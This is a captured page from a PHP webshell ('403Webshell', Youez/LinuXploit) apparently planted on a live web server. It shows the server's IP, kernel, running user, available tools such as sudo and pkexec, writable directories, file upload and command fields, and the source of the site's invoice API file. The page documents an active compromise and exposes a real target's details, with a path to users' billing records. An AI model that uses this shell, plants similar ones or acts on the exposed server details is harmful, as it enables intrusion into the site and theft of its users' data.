403Webshell
Server IP : 158.247.231.215  /  Your IP : 216.73.217.84
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux CTMS 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /mnt/blockstorage/ctms/api/custom-api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /mnt/blockstorage/ctms/api/custom-api/user-invoices.php
<?php
/**
 * Get User Invoices API
 * GET /api/custom-api/user-invoices.php
 * Requires: Authorization header with Bearer token
 */

header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: GET, OPTIONS');
header("Access-Control-Allow-Headers: X-Requested-With, Content-Type, Authorization");
header('Content-Type: application/json');

if ($_SERVER['REQUEST_METHOD'] === 'OPTIONS') {
    http_response_code(200);
    exit();
}

// Load WordPress
require_once('/mnt/blockstorage/ctms/wp-load.php');
require_once('auth-helper.php');

if ($_SERVER['REQUEST_METHOD'] !== 'GET') {
    send_error_response('Only GET requests are allowed', 405);
}

// Verify JWT token
$user_id = verify_jwt_token();

if (!$user_id) {
    send_error_response('User not authenticated', 401);
}

global $wpdb;

// Get orders
$orders = $wpdb->get_results($wpdb->prepare(
    "SELECT
        o.id,
        o.code,
        o.membership_id,
        ml.name as membership_name,
        o.total,
        o.subtotal,
        o.tax,
        o.couponamount,
        o.payment_type,
        o.cardtype,
        o.status,
        o.gateway,
        o.gateway_environment,
        o.timestamp
    FROM {$wpdb->prefix}pmpro_membership_orders o
    LEFT JOIN {$wpdb->prefix}pmpro_membership_levels ml ON o.membership_id = ml.id
    WHERE o.user_id = %d
    ORDER BY o.timestamp DESC",
    $user_id
));

$currency = get_option('pmpro_currency', 'USD');

send_json_response(array(
    'success' => true,
    'invoices' => array_map(function($order) use ($currency) {
        return array(
            'id' => (int) $order->id,
            'code' => $order->code,
            'membership_id' => (int) $order->membership_id,
            'membership_name' => $order->membership_name,
            'amount' => (float) $order->total,
            'subtotal' => (float) $order->subtotal,
            'tax' => (float) $order->tax,
            'discount' => (float) $order->couponamount,
            'currency' => $currency,
            'payment_type' => $order->payment_type,
            'card_type' => $order->cardtype,
            'status' => $order->status,
            'gateway' => $order->gateway,
            'date' => $order->timestamp,
        );
    }, $orders),
    'total_count' => count($orders),
), 200);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit